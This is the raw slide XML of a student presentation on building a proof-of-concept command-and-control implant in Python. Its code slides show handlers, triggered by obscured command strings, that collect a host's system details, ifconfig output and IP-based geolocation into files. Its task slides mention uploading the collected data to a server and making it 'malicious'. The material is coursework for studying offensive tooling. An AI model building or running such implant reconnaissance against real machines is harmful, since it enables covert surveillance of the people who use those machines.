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2" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="269" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="274" r:id="rId7"/>
    <p:sldId id="270" r:id="rId8"/>
    <p:sldId id="275" r:id="rId9"/>
    <p:sldId id="273" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="27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2AA2923-2ABD-4DEF-9D7A-C63130C047F9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2C785EC-9B0A-46CA-8D83-6BEEE165421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56850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2923-2ABD-4DEF-9D7A-C63130C047F9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785EC-9B0A-46CA-8D83-6BEEE165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350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2923-2ABD-4DEF-9D7A-C63130C047F9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785EC-9B0A-46CA-8D83-6BEEE165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8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2923-2ABD-4DEF-9D7A-C63130C047F9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785EC-9B0A-46CA-8D83-6BEEE165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02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AA2923-2ABD-4DEF-9D7A-C63130C047F9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C785EC-9B0A-46CA-8D83-6BEEE165421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63014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2923-2ABD-4DEF-9D7A-C63130C047F9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785EC-9B0A-46CA-8D83-6BEEE165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066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2923-2ABD-4DEF-9D7A-C63130C047F9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785EC-9B0A-46CA-8D83-6BEEE165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44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2923-2ABD-4DEF-9D7A-C63130C047F9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785EC-9B0A-46CA-8D83-6BEEE165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85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2923-2ABD-4DEF-9D7A-C63130C047F9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785EC-9B0A-46CA-8D83-6BEEE165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83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AA2923-2ABD-4DEF-9D7A-C63130C047F9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C785EC-9B0A-46CA-8D83-6BEEE165421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69105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AA2923-2ABD-4DEF-9D7A-C63130C047F9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C785EC-9B0A-46CA-8D83-6BEEE165421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8993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2AA2923-2ABD-4DEF-9D7A-C63130C047F9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2C785EC-9B0A-46CA-8D83-6BEEE165421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5878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25" y="1788454"/>
            <a:ext cx="9720197" cy="2098226"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t>Exploring C2: part </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a: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smtClean="0"/>
              <a:t>“Tell Me More”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53012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Rick Matthews</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSC 842</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cycle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blue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68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Geographic Location - code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71600" y="1798610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</a:rPr>
              <a:t>#get geolocation  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> command == "gi195456":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>myIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>getMyIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    geo = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>geocoder.ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('me')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    print "get system's geo information"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 'Geo Information %s\n'\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    'public IP    :%s \n' \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> / long   :%s \n' \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    'country      :%s \n' \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    'state        :%s \n' \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    'city         :%s \n' % (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>geo.ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>geo.latlng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>geo.country</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>geo.state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>geo.city</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>    file = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>geoinfo.txt","w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>file.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>file.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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14650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Geographic Location - code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71600" y="2391078"/>
            <a:ext cx="92105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</a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>getMyIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>sck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>socket.socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>socket.AF_INET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>socket.SOCK_DGRAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>sck.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(("8.8.8.8",80))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sck.getsockname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="980456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Upload files / info to a server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make malicious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93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Continued with same project from Cycles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3, 6, and 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>wanted to get more information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proof </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of Concept</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Still very basic but I’m enjoying learning and using various concepts and techniques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350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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ubuntu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IA Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ubuntu VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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104962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System Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Get Network Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Geographic Location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01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System Information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536043"/>
            <a:ext cx="9154803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22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System Information - code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08414" y="1873425"/>
            <a:ext cx="963722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#get system info   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command == "si37465":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"Get this system's info ..."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sysinfo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'System Information \n'\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:%s \n' \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'system    :%s \n' \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'node      :%s \n' \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'release   :%s \n' \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'version   :%s \n' \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'machine   :%s \n' \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'processor :%s \n' %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platform.uname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platform.system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platform.node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platform.release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platform.version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platform.machine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platform.processor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file = open("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sysinfo.txt","w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file.write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sysinfo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file.close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   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74311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Network Information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80" y="2171700"/>
            <a:ext cx="7287642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63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Network Information - code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2171700"/>
            <a:ext cx="812430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</a:rPr>
              <a:t>#get network info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> command == "ni496320":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    print "Get this system's network info ..."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>netinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>os.popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>").read()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    file = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netinfo.txt","w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>file.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>netinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>file.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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4277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Geographic Location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566813"/>
            <a:ext cx="3229426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97196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2715</TotalTime>
  <Words>392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Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Crop</vt:lpstr>
      <vt:lpstr>Exploring C2: part 4 “Tell Me More”</vt:lpstr>
      <vt:lpstr>Status</vt:lpstr>
      <vt:lpstr>Environment</vt:lpstr>
      <vt:lpstr>Tasks</vt:lpstr>
      <vt:lpstr>Get System Information</vt:lpstr>
      <vt:lpstr>Get System Information - code</vt:lpstr>
      <vt:lpstr>Get Network Information</vt:lpstr>
      <vt:lpstr>Get Network Information - code</vt:lpstr>
      <vt:lpstr>Get Geographic Location</vt:lpstr>
      <vt:lpstr>Get Geographic Location - code</vt:lpstr>
      <vt:lpstr>Get Geographic Location - code</vt:lpstr>
      <vt:lpstr>Future Work</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Coastal Carolina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C2</dc:title>
  <dc:creator>Richard M. Matthews, III</dc:creator>
  <cp:lastModifiedBy>Richard M. Matthews, III</cp:lastModifiedBy>
  <cp:revision>39</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-06-01T15:19:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-03T12:08:05Z</dcterms:modified>
</cp:coreProperties>
</file>